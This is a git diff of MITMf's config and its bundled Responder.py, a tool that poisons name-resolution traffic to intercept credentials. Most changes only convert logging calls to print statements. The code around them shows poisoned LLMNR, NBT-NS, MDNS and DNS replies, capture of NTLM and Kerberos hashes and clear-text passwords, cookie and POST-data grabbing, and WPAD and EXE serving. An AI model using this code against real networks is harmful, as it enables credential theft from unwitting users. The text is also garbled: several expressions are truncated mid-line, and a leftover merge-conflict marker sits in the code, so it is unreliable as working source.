diff --git a/config/mitmf.cfg b/config/mitmf.cfg index fe81a8c..c67ff85 100644 --- a/config/mitmf.cfg +++ b/config/mitmf.cfg @@ -2,8 +2,7 @@ [MITMf] - #here you can set the arguments to pass to MITMf when it starts so all you need to do is run ```python mitmf.py``` - #(assuming you config file is in the default directory) + #here you can set the arguments to pass to MITMf when it starts so all you need to do is run ```python mitmf.py``` (assuming you config file is in the default directory) args='' #Required BeEF and Metasploit options diff --git a/libs/responder/Responder.py b/libs/responder/Responder.py index 2b6851f..ea5880c 100755 --- a/libs/responder/Responder.py +++ b/libs/responder/Responder.py @@ -291,19 +291,17 @@ class NB(BaseRequestHandler): if Is_Finger_On(Finger_On_Off): try: Finger = RunSmbFinger((self.client_address[0],445)) - Message = "%s [Analyze mode: NBT-NS] OS: %s Client Version: %s is looking for: %s Service requested is: %s"%(self.client_address[0], Finger[0], Finger[1], Name, NBT_NS_Role(data[43:46])) + Message = "[Analyze mode: NBT-NS] Host: %s is looking for : %s. Service requested is: %s.\nOs Version is: %s Client Version is: %s"%(self.client_address[0], Name,NBT_NS_Role(data[43:46]),Finger[0],Finger[1]) logger3.warning(Message) except Exception: - Message = "%s [Analyze mode: NBT-NS] is looking for : %s Service requested is: %s"%(self.client_address[0], Name,NBT_NS_Role(data[43:46])) + Message = "[Analyze mode: NBT-NS] Host: %s is looking for : %s. Service requested is: %s\n"%(self.client_address[0], Name,NBT_NS_Role(data[43:46])) logger3.warning(Message) if PrintLLMNRNBTNS(AnalyzeFilename,Message): - #print Message - logger3.warning(Message) + print Message else: - Message = "%s [Analyze mode: NBT-NS] is looking for : %s. Service requested is: %s"%(self.client_address[0], Name,NBT_NS_Role(data[43:46])) + Message = "[Analyze mode: NBT-NS] Host: %s is looking for : %s. Service requested is: %s"%(self.client_address[0], Name,NBT_NS_Role(data[43:46])) if PrintLLMNRNBTNS(AnalyzeFilename,Message): - #print Message - logger3.warning(Message) + print Message logger3.warning(Message) if RespondToSpecificHost(RespondTo) and Analyze(AnalyzeMode) == False: @@ -319,17 +317,17 @@ class NB(BaseRequestHandler): Message = 'NBT-NS Answer sent to: %s. The requested name was : %s'%(self.client_address[0], Name) logging.warning(Message) if PrintLLMNRNBTNS(Log2Filename,Message): - #print Message + print Message logger2.warning(Message) if Is_Finger_On(Finger_On_Off): try: Finger = RunSmbFinger((self.client_address[0],445)) - #print '[+] OsVersion is:%s'%(Finger[0]) - #print '[+] ClientVersion is :%s'%(Finger[1]) - logging.warning('OsVersion is:%s'%(Finger[0])) - logging.warning('ClientVersion is :%s'%(Finger[1])) + print '[+] OsVersion is:%s'%(Finger[0]) + print '[+] ClientVersion is :%s'%(Finger[1]) + logging.warning('[+] OsVersion is:%s'%(Finger[0])) + logging.warning('[+] ClientVersion is :%s'%(Finger[1])) except Exception: - logging.warning('Fingerprint failed for host: %s'%(self.client_address[0])) + logging.warning('[+] Fingerprint failed for host: %s'%(self.client_address[0])) pass if RespondToSpecificName(RespondToName) and RespondToNameScope(RespondToName.upper(), Name.upper()): DnsCache.getInstance().setCustomRes(Name.lower()) @@ -340,17 +338,17 @@ class NB(BaseRequestHandler): Message = 'NBT-NS Answer sent to: %s. The requested name was : %s'%(self.client_address[0], Name) logging.warning(Message) if PrintLLMNRNBTNS(Log2Filename,Message): - #print Message + print Message logger2.warning(Message) if Is_Finger_On(Finger_On_Off): try: Finger = RunSmbFinger((self.client_address[0],445)) - #print '[+] OsVersion is:%s'%(Finger[0]) - #print '[+] ClientVersion is :%s'%(Finger[1]) - logging.warning('OsVersion is:%s'%(Finger[0])) - logging.warning('ClientVersion is :%s'%(Finger[1])) + print '[+] OsVersion is:%s'%(Finger[0]) + print '[+] ClientVersion is :%s'%(Finger[1]) + logging.warning('[+] OsVersion is:%s'%(Finger[0])) + logging.warning('[+] ClientVersion is :%s'%(Finger[1])) except Exception: - logging.warning('Fingerprint failed for host: %s'%(self.client_address[0])) + logging.warning('[+] Fingerprint failed for host: %s'%(self.client_address[0])) pass else: pass @@ -369,17 +367,17 @@ class NB(BaseRequestHandler): Message = 'NBT-NS Answer sent to: %s. The requested name was : %s'%(self.client_address[0], Name) logging.warning(Message) if PrintLLMNRNBTNS(Log2Filename,Message): - #print Message + print Message logger2.warning(Message) if Is_Finger_On(Finger_On_Off): try: Finger = RunSmbFinger((self.client_address[0],445)) - #print '[+] OsVersion is:%s'%(Finger[0]) - p#rint '[+] ClientVersion is :%s'%(Finger[1]) - logging.warning('OsVersion is:%s'%(Finger[0])) - logging.warning('ClientVersion is :%s'%(Finger[1])) + print '[+] OsVersion is:%s'%(Finger[0]) + print '[+] ClientVersion is :%s'%(Finger[1]) + logging.warning('[+] OsVersion is:%s'%(Finger[0])) + logging.warning('[+] ClientVersion is :%s'%(Finger[1])) except Exception: - logging.warning('Fingerprint failed for host: %s'%(self.client_address[0])) + logging.warning('[+] Fingerprint failed for host: %s'%(self.client_address[0])) pass if RespondToSpecificName(RespondToName) == False: DnsCache.getInstance().setCustomRes(Name.lower()) @@ -390,17 +388,17 @@ class NB(BaseRequestHandler): Message = 'NBT-NS Answer sent to: %s. The requested name was : %s'%(self.client_address[0], Name) logging.warning(Message) if PrintLLMNRNBTNS(Log2Filename,Message): - #print Message + print Message logger2.warning(Message) if Is_Finger_On(Finger_On_Off): try: Finger = RunSmbFinger((self.client_address[0],445)) - #print '[+] OsVersion is:%s'%(Finger[0]) - #print '[+] ClientVersion is :%s'%(Finger[1]) - logging.warning('OsVersion is:%s'%(Finger[0])) - logging.warning('ClientVersion is :%s'%(Finger[1])) + print '[+] OsVersion is:%s'%(Finger[0]) + print '[+] ClientVersion is :%s'%(Finger[1]) + logging.warning('[+] OsVersion is:%s'%(Finger[0])) + logging.warning('[+] ClientVersion is :%s'%(Finger[1])) except Exception: - logging.warning('Fingerprint failed for host: %s'%(self.client_address[0])) + logging.warning('[+] Fingerprint failed for host: %s'%(self.client_address[0])) pass else: pass @@ -460,17 +458,17 @@ def RAPThisDomain(Client,Domain): PDC = RapFinger(Client,Domain,"\x00\x00\x00\x80") if PDC is not None: l.append('[Analyze mode LANMAN]:') - l.append('Domain detected on this network:') + l.append('[!]Domain detected on this network:') for x in PDC: l.append(' -'+x) SQL = RapFinger(Client,Domain,"\x04\x00\x00\x00") if SQL is not None: - l.append('SQL Server detected on Domain %s:'%(Domain)) + l.append('[!]SQL Server detected on Domain %s:'%(Domain)) for x in SQL: l.append(' -'+x) WKST = RapFinger(Client,Domain,"\xff\xff\xff\xff") if WKST is not None: - l.append('Workstations/Servers detected on Domain %s:'%(Domain)) + l.append('[!]Workstations/Servers detected on Domain %s:'%(Domain)) for x in WKST: l.append(' -'+x) else: @@ -537,12 +535,11 @@ def BecomeBackup(data,Client): Role = NBT_NS_Role(data[45:48]) Message = "[Analyze mode: Browser]Datagram Request from IP: %s hostname: %s via the: %s wants to become a Local Master Browser Backup on this domain: %s."%(Client, Name,Role,Domain) if PrintLLMNRNBTNS(AnalyzeFilename,Message): - #print Message - logger3.warning(Message) + print Message if AnalyzeMode: Message1=RAPThisDomain(Client,Domain) if PrintLLMNRNBTNS(AnalyzeFilename,Message1): - #print Message1 + print Message1 logger3.warning(Message1) logger3.warning(Message) except: @@ -557,12 +554,11 @@ def ParseDatagramNBTNames(data,Client): Message = '[Analyze mode: Browser]Datagram Request from IP: %s hostname: %s via the: %s to: %s. Service: %s'%(Client, Name, Role1, Domain, Role2) if Role2 == "Domain controller service. This name is a domain controller." or Role2 == "Browser Election Service." or Role2 == "Local Master Browser.": if PrintLLMNRNBTNS(AnalyzeFilename,Message): - #print Message - logger3.warning(Message) + print Message if AnalyzeMode: Message1=RAPThisDomain(Client,Domain) if PrintLLMNRNBTNS(AnalyzeFilename,Message1): - #print Message1 + print Message1 logger3.warning(Message1) logger3.warning(Message) except: @@ -676,10 +672,10 @@ def ParseSMBHash(data,client): writehash = User+"::"+Domain+":"+LMHash+":"+NtHash+":"+NumChal outfile = os.path.join(ResponderPATH,"SMB-NTLMv1ESS-Client-"+client+".txt") if PrintData(outfile,User+"::"+Domain): - logging.warning("SMB-NTLMv1 hash captured from : ",client) - logging.warning("SMB complete hash is :", writehash) + print "[+]SMB-NTLMv1 hash captured from : ",client + print "[+]SMB complete hash is :", writehash WriteData(outfile,writehash,User+"::"+Domain) - logging.warning('SMB-NTLMv1 complete hash is :%s'%(writehash)) + logging.warning('[+]SMB-NTLMv1 complete hash is :%s'%(writehash)) if NthashLen > 60: outfile = os.path.join(ResponderPATH,"SMB-NTLMv2-Client-"+client+".txt") @@ -692,10 +688,10 @@ def ParseSMBHash(data,client): User = SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','') writehash = User+"::"+Domain+":"+NumChal+":"+NtHash[:32]+":"+NtHash[32:] if PrintData(outfile,User+"::"+Domain): - logging.warning("SMB-NTLMv2 hash captured from : ",client) - logging.warning("SMB complete hash is :", writehash) + print "[+]SMB-NTLMv2 hash captured from : ",client + print "[+]SMB complete hash is :", writehash WriteData(outfile,writehash,User+"::"+Domain) - logging.warning('SMB-NTLMv2 complete hash is :%s'%(writehash)) + logging.warning('[+]SMB-NTLMv2 complete hash is :%s'%(writehash)) #Parse SMB NTLMv1/v2 def ParseLMNTHash(data,client): @@ -706,33 +702,33 @@ def ParseLMNTHash(data,client): Bcc = struct.unpack(' 25: Hash = data[65+LMhashLen:65+LMhashLen+NthashLen] - logging.warning('SMB-NTLMv2 hash captured from :%s'%(client)) + logging.warning('[+]SMB-NTLMv2 hash captured from :%s'%(client)) outfile = os.path.join(ResponderPATH,"SMB-NTLMv2-Client-"+client+".txt") pack = tuple(data[89+NthashLen:].split('\x00\x00\x00'))[:2] var = [e.replace('\x00','') for e in data[89+NthashLen:Bcc+60].split('\x00\x00\x00')[:2]] Username, Domain = tuple(var) Writehash = Username+"::"+Domain+":"+NumChal+":"+Hash.encode('hex')[:32].upper()+":"+Hash.encode('hex')[32:].upper() if PrintData(outfile,Username+"::"+Domain): - logging.warning("SMB-NTLMv2 hash captured from :",client) - logging.warning("SMB-NTLMv2 complete hash is :",Writehash) + print "[+]SMB-NTLMv2 hash captured from :",client + print "[+]SMB-NTLMv2 complete hash is :",Writehash ParseShare(data) WriteData(outfile,Writehash, Username+"::"+Domain) - logging.warning('SMB-NTLMv2 complete hash is :%s'%(Writehash)) + logging.warning('[+]SMB-NTLMv2 complete hash is :%s'%(Writehash)) if NthashLen == 24: - logging.warning('SMB-NTLMv1 hash captured from :%s'%(client)) + logging.warning('[+]SMB-NTLMv1 hash captured from :%s'%(client)) outfile = os.path.join(ResponderPATH,"SMB-NTLMv1-Client-"+client+".txt") pack = tuple(data[89+NthashLen:].split('\x00\x00\x00'))[:2] var = [e.replace('\x00','') for e in data[89+NthashLen:Bcc+60].split('\x00\x00\x00')[:2]] Username, Domain = tuple(var) writehash = Username+"::"+Domain+":"+data[65:65+LMhashLen].encode('hex').upper()+":"+data[65+LMhashLen:65+LMhashLen+NthashLen].encode('hex').upper()+":"+NumChal if PrintData(outfile,Username+"::"+Domain): - logging.warning("SMB-NTLMv1 hash captured from : ",client) - logging.warning("SMB complete hash is :", writehash) + print "[+]SMB-NTLMv1 hash captured from : ",client + print "[+]SMB complete hash is :", writehash ParseShare(data) WriteData(outfile,writehash, Username+"::"+Domain) - logging.warning('SMB-NTLMv1 complete hash is :%s'%(writehash)) - logging.warning('SMB-NTLMv1 Username:%s'%(Username)) - logging.warning('SMB-NTLMv1 Domain (if joined, if not then computer name) :%s'%(Domain)) + logging.warning('[+]SMB-NTLMv1 complete hash is :%s'%(writehash)) + logging.warning('[+]SMB-NTLMv1 Username:%s'%(Username)) + logging.warning('[+]SMB-NTLMv1 Domain (if joined, if not then computer name) :%s'%(Domain)) except Exception: raise @@ -748,7 +744,7 @@ def IsNT4ClearTxt(data): if PassLen > 2: Password = data[HeadLen+30:HeadLen+30+PassLen].replace("\x00","") User = ''.join(tuple(data[HeadLen+30+PassLen:].split('\x00\x00\x00'))[:1]).replace("\x00","") - #print "[SMB]Clear Text Credentials: %s:%s" %(User,Password) + print "[SMB]Clear Text Credentials: %s:%s" %(User,Password) logging.warning("[SMB]Clear Text Credentials: %s:%s"%(User,Password)) #SMB Server class, NTLMSSP @@ -989,11 +985,11 @@ class KerbTCP(BaseRequestHandler): if KerbHash: Outfile = os.path.join(ResponderPATH,"MSKerberos-Client-"+self.client_address[0]+".txt") if PrintData(Outfile,KerbHash): - logging.warning("MSKerbv5 hash captured from : ", self.client_address[0]) - #print "[+]MSKerbv5 complete hash is :", KerbHash + print "[+]MSKerbv5 hash captured from : ", self.client_address[0] + print "[+]MSKerbv5 complete hash is :", KerbHash Outfile = os.path.join(ResponderPATH,"MSKerberos-Client-"+self.client_address[0]+".txt") WriteData(Outfile,KerbHash, KerbHash) - logging.warning('MSKerbv5 complete hash is :%s'%(KerbHash)) + logging.warning('[+]MSKerbv5 complete hash is :%s'%(KerbHash)) except Exception: raise @@ -1006,11 +1002,11 @@ class KerbUDP(BaseRequestHandler): if KerbHash: Outfile = os.path.join(ResponderPATH,"MSKerberos-Client-"+self.client_address[0]+".txt") if PrintData(Outfile,KerbHash): - logging.warning("MSKerbv5 hash captured from : ", self.client_address[0]) - #print "[+]MSKerbv5 complete hash is :", KerbHash + print "[+]MSKerbv5 hash captured from : ", self.client_address[0] + print "[+]MSKerbv5 complete hash is :", KerbHash Outfile = os.path.join(ResponderPATH,"MSKerberos-Client-"+self.client_address[0]+".txt") WriteData(Outfile,KerbHash, KerbHash) - logging.warning('MSKerbv5 complete hash is :%s'%(KerbHash)) + logging.warning('[+]MSKerbv5 complete hash is :%s'%(KerbHash)) except Exception: raise @@ -1037,13 +1033,13 @@ def ParseSQLHash(data,client): User = SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00','') outfile = os.path.join(ResponderPATH,"MSSQL-NTLMv1-Client-"+client+".txt") if PrintData(outfile,User+"::"+Domain): - logging.warning("MSSQL NTLMv1 hash captured from :",client) - logging.warning('MSSQL NTLMv1 Complete hash is: %s'%(User+"::"+Domain+":"+LMHash+":"+NtHash+":"+NumChal)) + print "[+]MSSQL NTLMv1 hash captured from :",client + print '[+]MSSQL NTLMv1 Complete hash is: %s'%(User+"::"+Domain+":"+LMHash+":"+NtHash+":"+NumChal) WriteData(outfile,User+"::"+Domain+":"+LMHash+":"+NtHash+":"+NumChal, User+"::"+Domain) - logging.warning('MsSQL NTLMv1 hash captured from :%s'%(client)) - logging.warning('MSSQL NTLMv1 User is :%s'%(SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00',''))) - logging.warning('MSSQL NTLMv1 Domain is :%s'%(Domain)) - logging.warning('MSSQL NTLMv1 Complete hash is: %s'%(User+"::"+Domain+":"+LMHash+":"+NtHash+":"+NumChal)) + logging.warning('[+]MsSQL NTLMv1 hash captured from :%s'%(client)) + logging.warning('[+]MSSQL NTLMv1 User is :%s'%(SSPIStart[UserOffset:UserOffset+UserLen].replace('\x00',''))) + logging.warning('[+]MSSQL NTLMv1 Domain is :%s'%(Domain)) + logging.warning('[+]MSSQL NTLMv1 Complete hash is: %s'%(User+"::"+Domain+":"+LMHash+":"+NtHash+":"+NumChal)) if NthashLen > 60: DomainLen = struct.unpack('>>>>>> parent of cd9a16d... fixed Responder plugin output WriteData(outfile,UserName+":"+PwdStr,UserName+":"+PwdStr) - logging.warning('MSSQL PlainText Password captured from :%s'%(client)) - logging.warning('MSSQL Username: %s Password: %s'%(UserName, PwdStr)) + logging.warning('[+]MSSQL PlainText Password captured from :%s'%(client)) + logging.warning('[+]MSSQL Username: %s Password: %s'%(UserName, PwdStr)) def ParsePreLoginEncValue(Data): @@ -1194,7 +1195,7 @@ def IsICMPRedirectPlausible(IP): dnsip.extend(ip[1:]) for x in dnsip: if x !="127.0.0.1" and IsOnTheSameSubnet(x,IP) == False: - print "| |_ [Analyze mode: ICMP] You can ICMP Redirect on this network. This workstation (%s) is not on the same subnet than the DNS server (%s). Use python Icmp-Redirect.py for more details."%(IP, x) + print "[Analyze mode: ICMP] You can ICMP Redirect on this network. This workstation (%s) is not on the same subnet than the DNS server (%s). Use python Icmp-Redirect.py for more details."%(IP, x) else: pass @@ -1223,16 +1224,17 @@ class LLMNR(BaseRequestHandler): if Is_Finger_On(Finger_On_Off): try: Finger = RunSmbFinger((self.client_address[0],445)) - Message = "%s [Analyze mode: LLMNR] OS: %s Client Version: %s is looking for : %s"%(self.client_address[0],Finger[0],Finger[1],Name) + Message = "[Analyze mode: LLMNR] Host: %s is looking for : %s.\nOs Version is: %s Client Version is: %s"%(self.client_address[0], Name,Finger[0],Finger[1]) logger3.warning(Message) except Exception: - Message = "%s [Analyze mode: LLMNR] is looking for : %s."%(self.client_address[0], Name) + Message = "[Analyze mode: LLMNR] Host: %s is looking for : %s."%(self.client_address[0], Name) logger3.warning(Message) if PrintLLMNRNBTNS(AnalyzeFilename,Message): - logger3.warning(Message) + print Message else: Message = "[Analyze mode: LLMNR] Host: %s is looking for : %s."%(self.client_address[0], Name) if PrintLLMNRNBTNS(AnalyzeFilename,Message): + print Message logger3.warning(Message) if DontRespondToSpecificHost(DontRespondTo): @@ -1254,17 +1256,17 @@ class LLMNR(BaseRequestHandler): Message = "LLMNR poisoned answer sent to this IP: %s. The requested name was : %s."%(self.client_address[0],Name) logging.warning(Message) if PrintLLMNRNBTNS(Log2Filename,Message): - #print Message + print Message logger2.warning(Message) if Is_Finger_On(Finger_On_Off): try: Finger = RunSmbFinger((self.client_address[0],445)) - #print '[+] OsVersion is:%s'%(Finger[0]) - #print '[+] ClientVersion is :%s'%(Finger[1]) - logging.warning('OsVersion is:%s'%(Finger[0])) - logging.warning('ClientVersion is :%s'%(Finger[1])) + print '[+] OsVersion is:%s'%(Finger[0]) + print '[+] ClientVersion is :%s'%(Finger[1]) + logging.warning('[+] OsVersion is:%s'%(Finger[0])) + logging.warning('[+] ClientVersion is :%s'%(Finger[1])) except Exception: - logging.warning('Fingerprint failed for host: %s'%(self.client_address[0])) + logging.warning('[+] Fingerprint failed for host: %s'%(self.client_address[0])) pass if RespondToSpecificName(RespondToName) and RespondToNameScope(RespondToName.upper(), Name.upper()): @@ -1276,17 +1278,17 @@ class LLMNR(BaseRequestHandler): Message = "LLMNR poisoned answer sent to this IP: %s. The requested name was : %s."%(self.client_address[0],Name) logging.warning(Message) if PrintLLMNRNBTNS(Log2Filename,Message): - #print Message + print Message logger2.warning(Message) if Is_Finger_On(Finger_On_Off): try: Finger = RunSmbFinger((self.client_address[0],445)) - #print '[+] OsVersion is:%s'%(Finger[0]) - #print '[+] ClientVersion is :%s'%(Finger[1]) - logging.warning('OsVersion is:%s'%(Finger[0])) - logging.warning('ClientVersion is :%s'%(Finger[1])) + print '[+] OsVersion is:%s'%(Finger[0]) + print '[+] ClientVersion is :%s'%(Finger[1]) + logging.warning('[+] OsVersion is:%s'%(Finger[0])) + logging.warning('[+] ClientVersion is :%s'%(Finger[1])) except Exception: - logging.warning('Fingerprint failed for host: %s'%(self.client_address[0])) + logging.warning('[+] Fingerprint failed for host: %s'%(self.client_address[0])) pass if Analyze(AnalyzeMode) == False and RespondToSpecificHost(RespondTo) == False: @@ -1298,17 +1300,17 @@ class LLMNR(BaseRequestHandler): for x in range(1): soc.sendto(str(buff), self.client_address) if PrintLLMNRNBTNS(Log2Filename,Message): - #print Message + print Message logger2.warning(Message) if Is_Finger_On(Finger_On_Off): try: Finger = RunSmbFinger((self.client_address[0],445)) - #print '[+] OsVersion is:%s'%(Finger[0]) - #print '[+] ClientVersion is :%s'%(Finger[1]) - logging.warning('OsVersion is:%s'%(Finger[0])) - logging.warning('ClientVersion is :%s'%(Finger[1])) + print '[+] OsVersion is:%s'%(Finger[0]) + print '[+] ClientVersion is :%s'%(Finger[1]) + logging.warning('[+] OsVersion is:%s'%(Finger[0])) + logging.warning('[+] ClientVersion is :%s'%(Finger[1])) except Exception: - logging.warning('Fingerprint failed for host: %s'%(self.client_address[0])) + logging.warning('[+] Fingerprint failed for host: %s'%(self.client_address[0])) pass if RespondToSpecificName(RespondToName) == False: buff = LLMNRAns(Tid=data[0:2],QuestionName=Name, AnswerName=Name) @@ -1318,17 +1320,17 @@ class LLMNR(BaseRequestHandler): for x in range(1): soc.sendto(str(buff), self.client_address) if PrintLLMNRNBTNS(Log2Filename,Message): - #print Message + print Message logger2.warning(Message) if Is_Finger_On(Finger_On_Off): try: Finger = RunSmbFinger((self.client_address[0],445)) - #print '[+] OsVersion is:%s'%(Finger[0]) - #print '[+] ClientVersion is :%s'%(Finger[1]) - logging.warning('OsVersion is:%s'%(Finger[0])) - logging.warning('ClientVersion is :%s'%(Finger[1])) + print '[+] OsVersion is:%s'%(Finger[0]) + print '[+] ClientVersion is :%s'%(Finger[1]) + logging.warning('[+] OsVersion is:%s'%(Finger[0])) + logging.warning('[+] ClientVersion is :%s'%(Finger[1])) except Exception: - logging.warning('Fingerprint failed for host: %s'%(self.client_address[0])) + logging.warning('[+] Fingerprint failed for host: %s'%(self.client_address[0])) pass else: pass @@ -1385,7 +1387,7 @@ class DNS(BaseRequestHandler): buff = DNSAns() buff.calculate(data) soc.sendto(str(buff), self.client_address) - #print "DNS Answer sent to: %s "%(self.client_address[0]) + print "DNS Answer sent to: %s "%(self.client_address[0]) logging.warning('DNS Answer sent to: %s'%(self.client_address[0])) class DNSTCP(BaseRequestHandler): @@ -1399,7 +1401,7 @@ class DNSTCP(BaseRequestHandler): buff = DNSAns() buff.calculate(data) self.request.send(str(buff)) - #print "DNS Answer sent to: %s "%(self.client_address[0]) + print "DNS Answer sent to: %s "%(self.client_address[0]) logging.warning('DNS Answer sent to: %s'%(self.client_address[0])) except Exception: @@ -1454,14 +1456,14 @@ class MDNS(BaseRequestHandler): try: if Analyze(AnalyzeMode): if Parse_IPV6_Addr(data): - #print '[Analyze mode: MDNS] Host: %s is looking for : %s'%(self.client_address[0],Parse_MDNS_Name(data)) + print '[Analyze mode: MDNS] Host: %s is looking for : %s'%(self.client_address[0],Parse_MDNS_Name(data)) logging.warning('[Analyze mode: MDNS] Host: %s is looking for : %s'%(self.client_address[0],Parse_MDNS_Name(data))) if RespondToSpecificHost(RespondTo): if Analyze(AnalyzeMode) == False: if RespondToIPScope(RespondTo, self.client_address[0]): if Parse_IPV6_Addr(data): - #print 'MDNS poisoned answer sent to this IP: %s. The requested name was : %s'%(self.client_address[0],Parse_MDNS_Name(data)) + print 'MDNS poisoned answer sent to this IP: %s. The requested name was : %s'%(self.client_address[0],Parse_MDNS_Name(data)) logging.warning('MDNS poisoned answer sent to this IP: %s. The requested name was : %s'%(self.client_address[0],Parse_MDNS_Name(data))) Name = Poisoned_MDNS_Name(data) MDns = MDNSAns(AnswerName = Name) @@ -1470,7 +1472,7 @@ class MDNS(BaseRequestHandler): if Analyze(AnalyzeMode) == False and RespondToSpecificHost(RespondTo) == False: if Parse_IPV6_Addr(data): - #print 'MDNS poisoned answer sent to this IP: %s. The requested name was : %s'%(self.client_address[0],Parse_MDNS_Name(data)) + print 'MDNS poisoned answer sent to this IP: %s. The requested name was : %s'%(self.client_address[0],Parse_MDNS_Name(data)) logging.warning('MDNS poisoned answer sent to this IP: %s. The requested name was : %s'%(self.client_address[0],Parse_MDNS_Name(data))) Name = Poisoned_MDNS_Name(data) MDns = MDNSAns(AnswerName = Name) @@ -1506,14 +1508,14 @@ def ParseHTTPHash(data,client): outfile = os.path.join(ResponderPATH,"HTTP-NTLMv1-Client-"+client+".txt") WriteHash = User+"::"+Hostname+":"+LMHash+":"+NtHash+":"+NumChal if PrintData(outfile,User+"::"+Hostname): - #print "[+]HTTP NTLMv1 hash captured from :",client - #print "Hostname is :", Hostname - #print "Complete hash is : ", WriteHash + print "[+]HTTP NTLMv1 hash captured from :",client + print "Hostname is :", Hostname + print "Complete hash is : ", WriteHash WriteData(outfile,WriteHash, User+"::"+Hostname) - logging.warning('HTTP NTLMv1 hash captured from :%s'%(client)) - logging.warning('HTTP NTLMv1 Hostname is :%s'%(Hostname)) - logging.warning('HTTP NTLMv1 User is :%s'%(data[UserOffset:UserOffset+UserLen].replace('\x00',''))) - logging.warning('HTTP NTLMv1 Complete hash is :%s'%(WriteHash)) + logging.warning('[+]HTTP NTLMv1 hash captured from :%s'%(client)) + logging.warning('[+]HTTP NTLMv1 Hostname is :%s'%(Hostname)) + logging.warning('[+]HTTP NTLMv1 User is :%s'%(data[UserOffset:UserOffset+UserLen].replace('\x00',''))) + logging.warning('[+]HTTP NTLMv1 Complete hash is :%s'%(WriteHash)) if NthashLen > 24: NthashLen = 64 @@ -1529,19 +1531,19 @@ def ParseHTTPHash(data,client): outfile = os.path.join(ResponderPATH,"HTTP-NTLMv2-Client-"+client+".txt") WriteHash = User+"::"+Domain+":"+NumChal+":"+NTHash[:32]+":"+NTHash[32:] if PrintData(outfile,User+"::"+Domain): - logging.warning("HTTP NTLMv2 hash captured from :",client) - logging.warning("Complete hash is : ", WriteHash) + print "[+]HTTP NTLMv2 hash captured from :",client + print "Complete hash is : ", WriteHash WriteData(outfile,WriteHash, User+"::"+Domain) - logging.warning('HTTP NTLMv2 hash captured from :%s'%(client)) - logging.warning('HTTP NTLMv2 User is : %s'%(User)) - logging.warning('HTTP NTLMv2 Domain is :%s'%(Domain)) - logging.warning('HTTP NTLMv2 Hostname is :%s'%(HostName)) - logging.warning('HTTP NTLMv2 Complete hash is :%s'%(WriteHash)) + logging.warning('[+]HTTP NTLMv2 hash captured from :%s'%(client)) + logging.warning('[+]HTTP NTLMv2 User is : %s'%(User)) + logging.warning('[+]HTTP NTLMv2 Domain is :%s'%(Domain)) + logging.warning('[+]HTTP NTLMv2 Hostname is :%s'%(HostName)) + logging.warning('[+]HTTP NTLMv2 Complete hash is :%s'%(WriteHash)) def GrabCookie(data,host): Cookie = re.search('(Cookie:*.\=*)[^\r\n]*', data) if Cookie: - CookieStr = "HTTP Cookie Header sent from: %s The Cookie is: \n%s"%(host,Cookie.group(0)) + CookieStr = "[+]HTTP Cookie Header sent from: %s The Cookie is: \n%s"%(host,Cookie.group(0)) logging.warning(CookieStr) return Cookie.group(0) else: @@ -1572,7 +1574,7 @@ def Basic_Ntlm(Basic): return IIS_Auth_401_Ans() def ServeEXE(data,client, Filename): - Message = "Sent %s file sent to: %s."%(Filename,client) + Message = "[+]Sent %s file sent to: %s."%(Filename,client) logging.warning(Message) with open (Filename, "rb") as bk: data = bk.read() @@ -1603,17 +1605,17 @@ def GrabURL(data, host): POST = re.findall('(?<=POST )[^HTTP]*', data) POSTDATA = re.findall('(?<=\r\n\r\n)[^*]*', data) if GET: - HostStr = "HTTP GET request from : %s. The HTTP URL requested was: %s"%(host, ''.join(GET)) + HostStr = "[+]HTTP GET request from : %s. The HTTP URL requested was: %s"%(host, ''.join(GET)) logging.warning(HostStr) - #print HostStr + print HostStr if POST: - Host3Str = "HTTP POST request from : %s. The HTTP URL requested was: %s"%(host,''.join(POST)) + Host3Str = "[+]HTTP POST request from : %s. The HTTP URL requested was: %s"%(host,''.join(POST)) logging.warning(Host3Str) - #print Host3Str + print Host3Str if len(''.join(POSTDATA)) >2: - PostData = 'The HTTP POST DATA in this request was: %s'%(''.join(POSTDATA).strip()) - #print PostData + PostData = '[+]The HTTP POST DATA in this request was: %s'%(''.join(POSTDATA).strip()) + print PostData logging.warning(PostData) #Handle HTTP packet sequence. @@ -1652,10 +1654,9 @@ def PacketSequence(data,client): NTLM_Auth= b64decode(''.join(Ntlm)) ParseHTTPHash(NTLM_Auth,client) if WpadForcedAuth(Force_WPAD_Auth) and WpadCustom(data,client): - Message = "WPAD (auth) file sent to: %s"%(client) + Message = "[+]WPAD (auth) file sent to: %s"%(client) if Verbose: - #print Message - logging.warning(Message) + print Message logging.warning(Message) buffer1 = WpadCustom(data,client) return buffer1 @@ -1669,13 +1670,13 @@ def PacketSequence(data,client): GrabURL(data,client) outfile = os.path.join(ResponderPATH,"HTTP-Clear-Text-Password-"+client+".txt") if PrintData(outfile,b64decode(''.join(BasicAuth))): - logging.warning("HTTP-User & Password:", b64decode(''.join(BasicAuth))) + print "[+]HTTP-User & Password:", b64decode(''.join(BasicAuth)) WriteData(outfile,b64decode(''.join(BasicAuth)), b64decode(''.join(BasicAuth))) - logging.warning('HTTP-User & Password: %s'%(b64decode(''.join(BasicAuth)))) + logging.warning('[+]HTTP-User & Password: %s'%(b64decode(''.join(BasicAuth)))) if WpadForcedAuth(Force_WPAD_Auth) and WpadCustom(data,client): - Message = "WPAD (auth) file sent to: %s"%(client) + Message = "[+]WPAD (auth) file sent to: %s"%(client) if Verbose: - logging.warning(Message) + print Message logging.warning(Message) buffer1 = WpadCustom(data,client) return buffer1 @@ -1697,10 +1698,9 @@ class HTTP(BaseRequestHandler): data = self.request.recv(8092) buff = WpadCustom(data,self.client_address[0]) if buff and WpadForcedAuth(Force_WPAD_Auth) == False: - Message = "WPAD (no auth) file sent to: %s"%(self.client_address[0]) + Message = "[+]WPAD (no auth) file sent to: %s"%(self.client_address[0]) if Verbose: - #print Message - logging.warning(Message) + print Message logging.warning(Message) self.request.send(buff) else: @@ -1923,48 +1923,48 @@ def ParseHTTPSHash(data,client): NthashOffset = struct.unpack(' 24: - #print "[+]HTTPS NTLMv2 hash captured from :",client - logging.warning('HTTPS NTLMv2 hash captured from :%s'%(client)) + print "[+]HTTPS NTLMv2 hash captured from :",client + logging.warning('[+]HTTPS NTLMv2 hash captured from :%s'%(client)) NthashLen = 64 DomainLen = struct.unpack('